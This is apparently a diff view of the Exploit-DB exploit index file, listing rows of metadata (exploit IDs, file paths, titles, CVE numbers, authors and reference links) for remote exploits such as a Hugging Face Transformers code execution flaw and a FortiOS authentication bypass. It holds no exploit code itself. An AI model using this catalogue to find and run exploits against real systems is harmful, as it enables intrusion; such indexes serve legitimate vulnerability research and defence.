52227,exploits/python/remote/52227.txt,"Hugging Face Transformers MobileViTV2 4.41.1 - Remote Code Execution (RCE)",2025-04-16,"The Kernel Panic",remote,python,,2025-04-16,2025-04-16,0,CVE-2024-11392,,,,,https://drive.google.com/file/d/14bnNaCRmFOQvPHUR9zQwdbjMmzKE2pZl/view?usp=drive_link
|
||||
41720,exploits/python/remote/41720.rb,"Logsign 4.4.2/4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,"Mehmet Ince",remote,python,,2017-03-24,2017-04-04,1,,"Metasploit Framework (MSF)",,,,https://github.com/rapid7/metasploit-framework/blob/a93aef8b7adecc4059c6cf168dd181e169cbc0b2/modules/exploits/linux/http/logsign_exec.rb
|
||||
46075,exploits/python/remote/46075.rb,"Mailcleaner - (Authenticated) Remote Code Execution (Metasploit)",2019-01-07,"Mehmet Ince",remote,python,443,2019-01-07,2019-03-17,0,,"Metasploit Framework (MSF)",,,,
|
||||
41942,exploits/python/remote/41942.rb,"Mercurial - Custom hg-ssh Wrapper Remote Code Exec (Metasploit)",2017-04-27,Metasploit,remote,python,22,2017-04-27,2017-04-27,1,,"Metasploit Framework (MSF)",,,,https://github.com/rapid7/metasploit-framework/blob/bbee7f86b5c1bd8b2e245b98fce1cb858b327948/modules/exploits/linux/ssh/mercurial_ssh_exec.rb
|
||||
|
@ -43283,6 +43304,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
35509,exploits/windows/remote/35509.pl,"FLVPlayer4Free 2.9 - '.fp4f' Remote Buffer Overflow",2011-03-27,KedAns-Dz,remote,windows,,2011-03-27,2014-12-09,1,,,,,,https://www.securityfocus.com/bid/47045/info
|
||||
3063,exploits/windows/remote/3063.pl,"Formbankserver 1.9 - 'Name' Directory Traversal",2007-01-01,Bl0od3r,remote,windows,,2006-12-31,,1,OSVDB-32545;CVE-2007-0055,,,,,
|
||||
19942,exploits/windows/remote/19942.txt,"Fortech Proxy+ 2.30 - Remote Administration",1999-12-26,anonymous,remote,windows,,1999-12-26,2012-07-19,1,OSVDB-84754,,,,,https://www.securityfocus.com/bid/1226/info
|
||||
52239,exploits/windows/remote/52239.py,"Fortinet FortiOS_ FortiProxy_ and FortiSwitchManager 7.2.0 - Authentication bypass",2025-04-16,ub3rsick,remote,windows,,2025-04-16,2025-04-16,0,CVE-2022-40684,,,,,
|
||||
44941,exploits/windows/remote/44941.txt,"Foxit Reader 9.0.1.1049 - Remote Code Execution",2018-06-25,mr_me,remote,windows,,2018-06-25,2018-06-25,1,CVE-2018-9958;CVE-2018-9948,"Use After Free (UAF)",,http://www.exploit-db.com/screenshots/idlt45000/poc.png,http://www.exploit-db.comFoxitReader901_enu_Setup_Prom.exe,
|
||||
24502,exploits/windows/remote/24502.rb,"Foxit Reader Plugin - URL Processing Buffer Overflow (Metasploit)",2013-02-14,Metasploit,remote,windows,,2013-02-14,2013-02-14,1,OSVDB-89030,"Metasploit Framework (MSF)",,,http://www.exploit-db.comFoxitReader544.1128_enu_Setup.exe,http://secunia.com/advisories/51733/
|
||||
854,exploits/windows/remote/854.cpp,"Foxmail 1.1.0.1 - POP3 Temp Dir Stack Overflow",2005-03-02,Swan,remote,windows,110,2005-03-01,,1,OSVDB-14370;CVE-2005-0635,,,,,
|
||||
|
@ -45834,6 +45856,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
35434,exploits/windows/remote/35434.txt,"WebKit 1.2.x - Local Webpage Cross Domain Information Disclosure",2011-03-09,"Aaron Sigel",remote,windows,,2011-03-09,2014-12-03,1,CVE-2011-0167;OSVDB-73773,,,,,https://www.securityfocus.com/bid/46816/info
|
||||
20125,exploits/windows/remote/20125.txt,"Weblogic 3.1.8/4.0.4/4.5.1 - Remote Command Execution",2000-08-01,"Foundstone Inc.",remote,windows,,2000-08-01,2012-07-31,1,CVE-2000-0685;OSVDB-59351,,,,,https://www.securityfocus.com/bid/1525/info
|
||||
29843,exploits/windows/remote/29843.txt,"webMethods Glue 6.5.1 Console - Directory Traversal",2007-04-11,"Patrick Webster",remote,windows,,2007-04-11,2013-11-27,1,CVE-2007-2048;OSVDB-34992,,,,,https://www.securityfocus.com/bid/23423/info
|
||||
52237,exploits/windows/remote/52237.txt,"WebMethods Integration Server 10.15.0.0000-0092 - Improper Access on Login Page",2025-04-16,"Rasime Ekici",remote,windows,,2025-04-16,2025-04-16,0,CVE-2024-23733,,,,,
|
||||
3395,exploits/windows/remote/3395.c,"WebMod 0.48 - Content-Length Remote Buffer Overflow",2007-03-01,cybermind,remote,windows,,2007-02-28,,1,OSVDB-33834;CVE-2007-1260,,,,,
|
||||
23411,exploits/windows/remote/23411.txt,"Websense Enterprise 4/5 - Blocked Sites Cross-Site Scripting",2003-12-03,"Mr. P.Taylor",remote,windows,,2003-12-03,2012-12-16,1,OSVDB-2901,,,,,https://www.securityfocus.com/bid/9149/info
|
||||
16802,exploits/windows/remote/16802.rb,"Webster HTTP Server - GET Buffer Overflow (Metasploit)",2010-11-03,Metasploit,remote,windows,,2010-11-03,2011-03-07,1,CVE-2002-2268;OSVDB-44106,"Metasploit Framework (MSF)",,,,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue